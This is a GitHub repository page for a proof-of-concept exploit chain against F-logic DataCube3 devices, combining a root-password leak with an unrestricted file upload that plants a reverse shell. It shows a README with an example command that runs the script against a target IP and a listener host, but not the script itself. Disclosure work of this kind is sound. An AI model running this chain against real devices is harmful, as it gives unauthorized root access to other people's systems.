Skip to content
/ CVE-2024-25832-PoC Public

PoC Script for CVE-2024-25832: Exploit chain reverse shell, information disclosure (root password leak) + unrestricted file upload in DataCube3

neroteam.com/blog/f-logic-datacube3-vulnerability-report
3 stars 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

0xNslabs/CVE-2024-25832-PoC

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit

README.md

README.md

 
 

datacube3.py

datacube3.py

 
 

Repository files navigation

CVE-2024-25830 and CVE-2024-25832 - DataCube3 Improper Access Control and Unrestricted File Upload.

Overview

This repository features a Proof of Concept (PoC) for a two-step exploit chain targeting DataCube3 devices. It combines CVE-2024-25830 (Improper Access Control) to extract root passwords and CVE-2024-25832 (Unrestricted File Upload) to deploy a reverse shell script. This PoC complements the detailed vulnerability analysis in the blog post "DataCube3 Vulnerability Report."

Affected versions

All F-logic DataCube3 devices version 1.0.

PoC Script Usage

# Usage: python datacube3.py --RHOST <Target-IP> --RPORT <Target-Port> --LHOST <Local-IP> --LPORT <Local-Port>
# Example: python datacube3.py --RHOST 192.168.1.1 --RPORT 443 --LHOST 192.168.1.100 --LPORT 4444

Video Proof of Concept

Script PoC CVE-2024-25832

Datacube3 Exploit chain

Note

FOR EDUCATIONAL PURPOSE ONLY.

About

PoC Script for CVE-2024-25832: Exploit chain reverse shell, information disclosure (root password leak) + unrestricted file upload in DataCube3

neroteam.com/blog/f-logic-datacube3-vulnerability-report

Topics

reverse-shell exploit vulnerability cve iot-security command-injection cve-2024-25830 cve-2024-25832

Resources

Readme
Activity
Custom properties

Stars

3 stars

Watchers

0 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages